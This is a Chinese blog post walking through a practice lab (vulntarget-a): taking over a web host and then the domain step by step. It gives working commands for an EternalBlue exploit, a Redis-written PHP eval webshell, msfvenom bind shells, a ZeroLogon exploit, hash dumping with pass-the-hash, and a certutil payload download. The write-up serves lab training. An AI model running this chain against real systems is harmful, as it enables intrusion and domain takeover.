靶机渗透日记-内网

已于 2022-03-22 14:37:17 修改
阅读量3.5k 收藏 2
点赞数
文章标签: 渗透测试 web安全
于 2022-03-22 14:35:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123659726
版权

在这里插入图片描述

  • WEB
    • win7/admin
  • 域成员
    • win2016/Admin#123
  • 域控
    • administrator/Admin@666

流程

  1. IP探测
    在这里插入图片描述

  2. 端口扫描

    在这里插入图片描述

  3. Win7系统,并且开放了139,445端口,尝试MS17-010

    在这里插入图片描述

    返回 system 权限

  4. 还有一种思路就是利用80端口的通达OA系统

    在这里插入图片描述

    使用工具上传一句话木马,使用蚁剑连接GETSHELL

    在这里插入图片描述

  5. 信息收集,发现WEB服务器存在双网卡

    在这里插入图片描述

  6. 添加路由信息

    run post/multi/manage/autoroute

    主机探测,这里使用UDP没有探测到,需要使用ARP探测

    use post/windows/gather/arp_scanner

    在这里插入图片描述

    得到 10.0.20.99 主机,对其进行端口扫描,开放了80,6379端口

    在这里插入图片描述

  7. 访问 80 端口

    在这里插入图片描述

    目录扫描

    在这里插入图片描述

    访问 l.php 可以发现是php探针,得到网站的绝对路径

    在这里插入图片描述

  8. 目标靶机还开放了6379端口,存在未授权访问

     proxychains4 redis-cli -h 10.0.20.99

    在这里插入图片描述

    写入一句话

    config set dir "C:/phpStudy/PHPTutorial/WWW/"
config set dbfilename tx.php
set 1 "<?php @eval($_POST['tx']);?>"
save

    在这里插入图片描述

  9. 上线MSF,生成payload

    msfvenom -p windows/x64/meterpreter/bind_tcp  lport=4455 -f exe > 1.exe

    通过蚁剑上传到目标主机

    netsh advfirewall firewall add rule name="bind_tcp" protocol=TCP dir=in localport=4455action=allow

    在这里插入图片描述

    在这里插入图片描述

    发现同样存在两个网段,10.0.20.99以及10.0.10.111;还有域环境

  10. 域信息收集

    域用户

    在这里插入图片描述

    域管理员

    在这里插入图片描述

    域成员主机

    在这里插入图片描述

    域控计算机

    在这里插入图片描述

    域控IP地址为 10.0.10.110

    在这里插入图片描述

  11. 使用cve-2020-1472

    git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .

    https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 -m pip install -r requirements.txt
proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

    在这里插入图片描述

    获取管理员HASH

    proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-pass

    在这里插入图片描述

    通过 smbexec.py 连接

    proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

    在这里插入图片描述

  12. 上线MSF

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4456 -f exe > 2.exe

    下载 payload

    certutil -urlcache -split -f http://10.0.10.111/2.exe c:\1.exe

    在这里插入图片描述

# .
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透学习日记day15
qq_44836237的博客
12-14 2343
这两天在学批量pofa&src提取,这里要用到pythonbase64加解密 base64加解密: 注意首先要导入base64的包 这里将字符串转编码或base64,要先将他转换成二进制数据,也就是图中上半部分 但是他这里给的方法多一步,有点繁琐,这里用下图的方法,可以省去前面的一步 这里得到的结果有个b,那么如何消除这里的b呢 可以加一个str(),采用utf-8的编码把它转换成字符串类型 ...
Metasploit渗透日记(三)
kopi_luwak的博客
07-15 185
情报搜集——漏洞扫描 项目简介 1、 OpenVAS简介 2、 OpneVAS的安装 3、 OpenVAS的使用 项目要求 硬件要求: 1、 Kali Linux系统的电脑一台 2、 局域网内的任何系统的PC,数量不限。 软件要求:(以下软件需要手动安装) 1、 OpnVAS 项目步骤 1、 OpenVAS简介 OpenVAS是一款类似与Nessus的综合性漏洞扫描器,主要用来识别远程主机、寻找主...
vulntarget靶场系列-a-writeup
渗透测试研究中心
12-13 642
网络配置外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adm...
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1004
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
渗透学习日记day1
qq_44836237的博客
11-06 501
之前一直没有记录学习过程的习惯,后来发现很多知识会有遗忘,但是其实要记录的知识点多且杂乱,本日记主要记录自己的学习路线,注重的是对自己一个学习体系的规划建立的帮助。 在之前的渗透学习中,安装了kali和owaspbwa的靶场 kalilinux网络配置主要通过NAT或桥接: NAT相当是通过VM里的虚拟交换机再地址转换后与外网通信,虚拟机可以单向向外网通信 桥接模式下虚拟机IP和本地IP相同,外网可以直接与虚拟机通信 补充:kali可以通过systemctl status <服务名&
渗透测试实习日记day1
weixin_43173059的博客
04-14 1047
渗透测试实习日记一、sqlmap爆破网站?二、抓肉鸡所用工具burpsuite 一、sqlmap爆破网站? 得到表 sqlmap -u “含注入点网址” --batch --tables --random-agent 得到列 sqlmap -u “含注入点网址” --batch --columns -T “member” --random-agent 得到字段名 sqlmap -u “含注入点网址” --batch --dump -C “m_username,m_userpass” -T “memb..
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
metasploit渗透学习日记
G46SEC
01-11 5150
PTES(渗透测试)标准中的渗透测试阶段 PTES标准中的渗透测试阶段是用来定义渗透测试过程,并确保客户组织能够以一种标准化的方式来扩展一次渗透测试。 1、情报收集 社交媒体网络 Google Hacking技术 目标系统踩点 最为重要的一项技术是对目标系统的探查能力,包括获知它的行为模式、运行机理,以及最终可以如何被攻击。 2、威胁建模阶段 威胁建模主要使用你在情报搜
菜鸡的渗透日记
蚁景网安学院
06-19 349
Fofa上找了个站,未授权,所以下文图片打码????漏洞url为:http://ip:port/1. 弱口令登录由于一个后台弱口令,才有了下面的渗透过程.试了个弱口令,admin,123...
被攻击的代码
weixin_30539835的博客
12-25 1235
<?phperror_reporting(E_ERROR);@ini_set('display_errors', 'Off');@ini_set('max_execution_time', 20000);@ini_set('memory_limit', '256M');header("content-Type: text/html; charset=utf-8");$password = "...
渗透测试学习之靶机DC-1
情感博主V
03-09 460
前言 开启靶机后,需要登录,感觉很真实,接下来是边学边玩吧。 信息搜集 1. 用nmap探测一下信息; 由于不知道靶机的IP地址,毕竟是在虚拟机的靶机,跟kali同一个网段,探测一下同一网段存活的主机。 nmap -sP 192.168.246.0/24ping扫描该网段: 192.168.246.2、254是网关,138是kali的,133就肯定是靶机的地址。 nmap -sV 192...
msf添加域控
weixin_50683638的博客
04-29 258
1、此篇文章仍与上续几篇msf相关,结合一下,作为此章节的笔记。 2,在msf中有很多模块,各模块用法就不一一赘述,简单说下所需要的模块内容。用这个模块来迁移进程,让meterpreter和session在同位。设置需要迁移进程的session。 3、添加路由run autoroute -s 192.168.1.0/24 run autoroute -p 4、扫描内网 use post/windows/gather/arp_scanner 设置需要扫描内网的ip和端口 再用use auxiliary
漏洞利用三:445端口漏洞利用
热门推荐
ZY95001的博客
09-04 1万+
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙 一、MS17-010 永恒之蓝 MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。 1.进入MSF控制台:msfconsole 2.找到要利用的漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
靶机渗透日记
Anonymous
01-21 2460
探测IP为192.168.1.214 端口开放了22,80端口 目录扫描 访问 80 端口 这里并没有发现其他可以利用的东西 访问 notes.txt 暂时用处也不大 访问 assets 文件夹 里面是一些js,css,图片也没有利用点 接下来在主页进行抓包 在主页发现cookie值像是base64 解密为false,尝试改成true并进行base64加密更改cookie值 刷新页面出现上传按钮 进入后发现可以上传文件,这里可以将.php后缀更改为.p..
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值